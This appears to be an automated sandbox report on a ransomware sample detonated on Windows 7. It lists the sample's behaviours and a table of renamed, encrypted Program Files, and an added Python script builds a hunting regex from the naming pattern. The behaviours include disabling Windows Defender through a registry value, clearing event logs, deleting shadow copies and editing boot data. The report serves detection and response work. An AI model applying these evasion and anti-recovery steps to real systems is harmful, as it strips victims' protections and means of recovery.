Analysis Overview
SHA256
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
Threat Level: Known bad
The file df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Reads user/profile data of web browsers
Loads dropped DLL
Enumerates connected drives
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 13:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 13:26
Reported
2022-01-13 13:31
Platform
win7-en-20211208
Max time kernel
106s
Max time network
15s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\ext\localedata.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\ja-JP\PurblePlace.exe.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21295_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00174_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Purble Place\en-US\PurblePlace.exe.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Couture.eftx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0234131.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\release.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\descript.ion.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105238.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00792_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03241_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21518_.GIF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
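Every renamed file in the table above has the same shape: the original name, then `.<token>_<12 characters>.2wfv1`, where the token `LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73` is identical for every file in this run and the 12-character block takes only two values (`AAAAAAAAAAA0` and `IAAAACAAAAA0`). A handful of rows (`.png`, `.mui`) were opened for modification but carry no marker; the table does not say whether the sample skipped them or the write was logged before a rename, so they are worth listing separately rather than guessing. The script below is an added example, not part of the report: it takes paths copied from the table, recovers the original extension of each encrypted file, groups the marker variants and emits a filename pattern for hunting. The regex shape, including the literal `.2wfv1` tail, is derived from this detonation alone and is not a claim about other samples.

```python
"""Recover the encryption naming scheme from the 'Drops file in Program Files
directory' rows of the report.

Added example, not part of the report. TOUCHED_PATHS are copied from the table;
the regex, grouping and hunting pattern are this example's own.
"""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Subset of the "File opened for modification" paths from the report (copied, not constructed).
TOUCHED_PATHS = [
    r"C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png",
    r"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1",
    r"C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1",
    r"C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_IAAAACAAAAA0.2wfv1",
    r"C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui",
    r"C:\Program Files\Java\jre7\release.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1",
    r"C:\Program Files\7-Zip\descript.ion.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1",
    r"C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1",
]

# <original name>.<token>_<12-char block>.2wfv1 -- the shape of every renamed file in the table.
# The literal tail "2wfv1" and the 12-char block width are observations from this run only.
ENCRYPTED_NAME_RE = re.compile(
    r"^(?P<orig>.*?)\.(?P<token>[A-Za-z0-9_-]+)_(?P<block>[A-Za-z0-9]{12})\.2wfv1$")


def split_encrypted_name(filename):
    """(original name, constant token, 12-char block) for an encrypted name, else None."""
    m = ENCRYPTED_NAME_RE.fullmatch(filename)
    return (m.group("orig"), m.group("token"), m.group("block")) if m else None


def summarize(paths):
    """Group marker variants and original file types; keep unmarked paths for review."""
    tokens, blocks, exts, unmarked = set(), Counter(), Counter(), []
    for path in paths:
        parts = split_encrypted_name(PureWindowsPath(path).name)
        if parts is None:
            unmarked.append(path)          # opened for modification, but no marker appended
            continue
        orig, token, block = parts
        tokens.add(token)
        blocks[block] += 1
        exts[PureWindowsPath(orig).suffix.lower() or "(none)"] += 1
    return {"tokens": tokens, "blocks": blocks, "original_extensions": exts, "unmarked": unmarked}


def hunting_regex(token):
    """Filename pattern for EDR or file-server hunts: fixed token, any 12-char block, fixed tail."""
    return r"\." + re.escape(token) + r"_[A-Za-z0-9]{12}\.2wfv1$"


def is_encrypted_name(token, filename):
    return re.search(hunting_regex(token), filename) is not None


if __name__ == "__main__":
    result = summarize(TOUCHED_PATHS)
    print("marker token(s):", result["tokens"])
    print("block variants:", dict(result["blocks"]))
    print("original extensions:", dict(result["original_extensions"]))
    print("unmarked paths:", result["unmarked"])
    print("hunt with:", hunting_regex(next(iter(result["tokens"]))))
```

Because the token is constant while the block varies, the hunting pattern fixes the former and wildcards the latter; a rule anchored on the complete observed extension would miss the `IAAAACAAAAA0` files.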
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI79F2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7A41.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7AFE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7B5C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7BBB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
